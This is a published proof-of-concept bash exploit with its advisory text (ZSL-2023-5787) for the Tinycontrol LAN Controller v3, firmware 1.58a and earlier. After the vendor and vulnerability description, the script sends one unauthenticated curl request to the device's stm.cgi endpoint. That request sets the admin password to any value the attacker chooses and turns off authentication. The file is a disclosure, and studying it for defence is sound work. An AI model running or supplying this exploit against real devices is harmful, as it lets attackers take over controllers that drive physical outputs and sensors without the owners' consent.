Tinycontrol LAN Controller 3 Remote Admin Password Change

`#!/bin/bash  
: "  
  
Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change  
  
  
Vendor: Tinycontrol  
Product web page: https://www.tinycontrol.pl  
Affected version: <=1.58a, HW 3.8  
  
Summary: Lan Controller is a very universal  
device that allows you to connect many different  
sensors and remotely view their readings and  
remotely control various types of outputs.  
It is also possible to combine both functions  
into an automatic if -> this with a calendar  
when -> then. The device provides a user interface  
in the form of a web page. The website presents  
readings of various types of sensors: temperature,  
humidity, pressure, voltage, current. It also  
allows you to configure the device, incl. event  
setting and controlling up to 10 outputs. Thanks  
to the support of many protocols, it is possible  
to operate from smartphones, collect and observ  
the results on the server, as well as cooperation  
with other I/O systems based on TCP/IP and Modbus.  
  
Desc: The application suffers from an insecure access  
control allowing an unauthenticated attacker to  
change accounts passwords and bypass authentication  
gaining panel control access.  
  
Tested on: lwIP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5787  
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php  
  
  
18.08.2023  
  
"  
  
set -euo pipefail  
IFS=$'\n\t'  
  
if [ $# -ne 2 ]; then  
echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'  
exit  
fi  
  
IP=$1  
PW=$2  
  
EN=$(echo -n $PW | base64)  
  
curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==  
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/  
echo -ne '\nAdmin password changed to: '$PW  
`